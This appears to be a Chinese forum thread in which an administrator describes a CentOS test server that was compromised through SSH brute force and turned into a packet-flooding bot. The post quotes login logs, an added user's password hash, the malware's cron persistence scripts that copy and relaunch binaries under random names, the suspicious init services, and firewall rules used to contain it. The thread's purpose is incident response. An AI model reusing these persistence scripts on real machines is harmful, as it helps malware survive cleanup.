测试服务器被肉鸡了，疯狂对外发包，拖垮内网。

xiaoyun222

5. 1之后上班，大家上网很慢慢时断时续。经过1个小时排查，发现是内部的一台centos测试服务器疯狂发包，拖垮整个网络。拔了测试服务器的网线一切恢复正常。


现登陆发现5.3号被暴力破解了root密码：
May  2 05:05:55 localhost sshd[8022]: Failed password for root from 221.203.3.102 port 14581 ssh2
May  2 05:05:58 localhost sshd[8022]: Failed password for root from 221.203.3.102 port 14581 ssh2
May  2 05:06:00 localhost sshd[8022]: Failed password for root from 221.203.3.102 port 14581 ssh2
May  2 05:06:02 localhost sshd[8022]: Failed password for root from 221.203.3.102 port 14581 ssh2
May  2 05:06:06 localhost sshd[8024]: Failed password for root from 221.203.3.102 port 28537 ssh2
May  3 01:05:47 localhost sshd[12939]: Accepted password for root from 221.203.142.133 port 29209 ssh2

并建立一个butter用户：
butter6$yuVnsOV4xTsU9ZJ$Ta8zM6yQoy33aDwyONYPQFdbqrju0AKqfMbxSjpUSXwJG4swdSoIIE7qKL3WWOZKwWyXZrJODjLjqSexoRPA6/:16910:0:99999:7:::


TOP 发现一些可疑的进程
[root@localhost ~]# top
top - 14:19:12 up 6 days, 15:43,  2 users,  load average: 0.00, 0.00, 0.00
Tasks: 125 total,   1 running, 124 sleeping,   0 stopped,   0 zombie
Cpu(s):  0.5%us,  2.2%sy,  0.0%ni, 97.3%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:   2952696k total,  2857820k used,    94876k free,   191960k buffers
Swap:  1572856k total,    43604k used,  1529252k free,   409704k cached
21780 root      20   0 17024 5416  244 S  2.0  0.2   6:09.03 foflcqdx                                                                  
17064 root      20   0  1376  944  168 S  0.3  0.0   0:00.01 doselqhzjku

[root@localhost log]# ls -al /proc/21780/exe
lrwxrwxrwx 1 root root 0 May 12 14:23 /proc/21780/exe -> /bin/foflcqdx
发现文件生成在/tmp目录下面，进程生成在/bin/,/usr/bin,/ /usr/local/bin等目录下面。这文件删除还会自动生成。

在/etc/cron.hourl下面产生一些脚本
[root@localhost cron.hourly]# ls
0anacron  gcc.sh  hh.tar  xdqclfof.sh

查看脚本内容：
vi gcc.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

vi xdqclfof.sh
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
rand=$(cat /dev/urandom | sed 's/[^a-zA-Z0-9]//g' | strings -n 5 | head -n 1)
cp "/bin/xdqclfof" "/bin/$rand"
"/bin/$rand"

现在木马还在，我做了iptables,禁止发包，禁止转发，禁止进入其他端口
iptables -I INPUT -p tcp --dport 80 -j ACCEPT
iptables -I INPUT -p tcp --dport 22 -j ACCEPT
iptables -I INPUT -p tcp --dport 3306 -j ACCEPT
iptables -I OUTPUT -p tcp --sport 22 -j ACCEPT
iptables -I OUTPUT -p tcp --sport 80 -j ACCEPT
iptables -I OUTPUT -p tcp --sport 3306 -j ACCEPT
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
service iptables save

大家帮忙出主意，如何找到木马的根源。不想装系统，只为谈论，学习。

xiaoyun222

netstat -anp
[root@localhost cron.daily]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      7077/sshd           
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      1038/master         
tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN      18640/mysqld        
tcp        0      1 127.0.0.1:59788             127.0.0.1:6004              SYN_SENT    6623/cat resolv.con
tcp        0      1 127.0.0.1:42301             127.0.0.1:1433              SYN_SENT    21780/acpid      


如果不在IPtbales的话，会连接一个澳洲ip的6004端口，现在做了iptables了，一直连接本机的6004端口。
tcp        0      1 127.0.0.1:59788             127.0.0.1:6004              SYN_SENT    6623/cat resolv.con
iptables开启，网卡流量瞬间几个G的。

jixuuse

如果是虚拟机，丢到一个受隔离子网里慢慢找

xiaoyun222

发现了可疑的启动服务，我已经给/etc/rc.d/init.d与/bin/目录加了i权限，怎么还可以写入文件
udev-post       0ff   1n    2n    3n    4n    5n    6ff
vtacpijwle      0ff   1n    2n    3:on    4:on    5:on    6:off
xdqclfof        0:off   1:on    2:on    3:on    4:on    5:on    6:off
[root@localhost log]# find / -name vtacpijwle
/etc/rc.d/init.d/vtacpijwle
/bin/vtacpijwle
[root@localhost log]# find / -name xdqclfof
/etc/rc.d/init.d/xdqclfof
/bin/xdqclfof
[root@localhost log]#

xiaoyun222

[root@localhost rc0.d]# /etc/rc.d/  目录下面产生了很多可疑进程，删除还会产生。

root@localhost rc.d]# ls
init.d  rc  rc0.d  rc1.d  rc2.d  rc3.d  rc4.d  rc5.d  rc6.d  rc.local  rc.sysinit
[root@localhost rc.d]# cd rc0.d/
[root@localhost rc0.d]# ll
total 0
lrwxrwxrwx. 1 root root 13 Dec 18 18:23 K05atd -> ../init.d/atd
lrwxrwxrwx. 1 root root 15 Dec 16 01:26 K05jexec -> ../init.d/jexec
lrwxrwxrwx. 1 root root 19 Dec 15 20:43 K10saslauthd -> ../init.d/saslauthd
lrwxrwxrwx  1 root root 22 Mar 15 19:43 K15htcacheclean -> ../init.d/htcacheclean
lrwxrwxrwx  1 root root 15 Mar 15 19:43 K15httpd -> ../init.d/httpd
lrwxrwxrwx. 1 root root 14 Dec 15 20:44 K25sshd -> ../init.d/sshd
lrwxrwxrwx. 1 root root 17 Dec 15 20:43 K30postfix -> ../init.d/postfix
lrwxrwxrwx  1 root root 16 Mar 15 19:42 K36mysqld -> ../init.d/mysqld
lrwxrwxrwx. 1 root root 20 Dec 15 20:43 K50netconsole -> ../init.d/netconsole
lrwxrwxrwx. 1 root root 15 Dec 15 20:43 K60crond -> ../init.d/crond
lrwxrwxrwx. 1 root root 26 Dec 15 20:44 K75blk-availability -> ../init.d/blk-availability
lrwxrwxrwx. 1 root root 15 Dec 15 20:43 K75netfs -> ../init.d/netfs
lrwxrwxrwx. 1 root root 19 Dec 15 20:43 K75udev-post -> ../init.d/udev-post
lrwxrwxrwx. 1 root root 21 Dec 15 20:43 K87restorecond -> ../init.d/restorecond
lrwxrwxrwx. 1 root root 16 Dec 15 20:44 K88auditd -> ../init.d/auditd
lrwxrwxrwx. 1 root root 17 Dec 15 20:43 K88rsyslog -> ../init.d/rsyslog
lrwxrwxrwx. 1 root root 15 Dec 15 20:43 K89rdisc -> ../init.d/rdisc
lrwxrwxrwx  1 root root 20 May 11 11:29 K90henrbnptpr -> ../init.d/henrbnptpr
lrwxrwxrwx. 1 root root 17 Dec 15 20:43 K90network -> ../init.d/network
lrwxrwxrwx  1 root root 20 May  6 11:17 K90pwcujalyib -> ../init.d/pwcujalyib
lrwxrwxrwx  1 root root 20 May  6 10:26 K90pxbaavmwym -> ../init.d/pxbaavmwym
lrwxrwxrwx  1 root root 20 May  5 23:20 K90qlubixqkkr -> ../init.d/qlubixqkkr
lrwxrwxrwx  1 root root 20 May  5 23:31 K90qpfrqtemjf -> ../init.d/qpfrqtemjf
lrwxrwxrwx  1 root root 20 May 12 17:28 K90shzipytesy -> ../init.d/shzipytesy
lrwxrwxrwx  1 root root 20 May  5 23:42 K90tbycnrexfm -> ../init.d/tbycnrexfm
lrwxrwxrwx  1 root root 20 May  6 10:26 K90tfadqadegf -> ../init.d/tfadqadegf
lrwxrwxrwx  1 root root 20 May  6 11:12 K90vlgggcqctp -> ../init.d/vlgggcqctp
lrwxrwxrwx  1 root root 20 May 11 12:08 K90vtacpijwle -> ../init.d/vtacpijwle
lrwxrwxrwx. 1 root root 19 Dec 15 20:43 K92ip6tables -> ../init.d/ip6tables
lrwxrwxrwx. 1 root root 18 Mar 15 19:38 K92iptables -> ../init.d/iptables
lrwxrwxrwx. 1 root root 22 Dec 15 20:44 K99lvm2-monitor -> ../init.d/lvm2-monitor
lrwxrwxrwx. 1 root root 17 Dec 15 20:43 S00killall -> ../init.d/killall
lrwxrwxrwx. 1 root root 14 Dec 15 20:43 S01halt -> ../init.d/halt

xiaoyun222

找到了crontab 的东西来执行gcc.sh给注释：
#*/3 * * * * root /etc/cron.hourly/gcc.sh

0wem

搞定了没？